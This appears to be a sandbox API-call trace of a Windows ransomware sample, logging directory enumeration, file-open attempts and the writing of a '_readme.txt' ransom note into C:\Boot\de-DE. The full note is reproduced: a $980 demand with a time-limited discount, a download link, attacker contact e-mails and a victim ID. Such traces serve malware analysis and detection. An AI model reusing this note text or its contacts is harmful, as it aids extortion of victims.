PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0178.662] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.662] PathFindFileNameW (pszPath="") returned="" [0178.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0178.662] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.663] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x800) returned 0x2d2ec90 [0178.663] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0178.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0178.663] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.663] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0178.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.663] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0178.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d32670 [0178.663] lstrcpyW (in: lpString1=0x2d32670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0178.663] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0178.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0178.663] CreateFileW (lpFileName="C:\\Boot\\de-DE\\_readme.txt" (normalized: "c:\\boot\\de-de\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0178.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32670 | out: hHeap=0x6a0000) returned 1 [0178.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.665] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*" (normalized: "c:\\boot\\de-de\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0178.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.665] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28d5e380, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.665] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0178.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f2d0 [0178.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.666] PathFindExtensionW (pszPath="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned=".mui" [0178.666] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f2d0 | out: hHeap=0x6a0000) returned 1 [0178.674] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95683fe0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28d5e380, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0178.674] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0178.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fe0 | out: hHeap=0x6a0000) returned 1 [0178.675] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0178.675] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.681] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.684] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.685] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.687] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.692] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.692] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.693] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0178.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.694] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0178.695] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0178.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0178.695] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27fb8 | out: hHeap=0x6a0000) returned 1 [0178.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0178.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0178.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 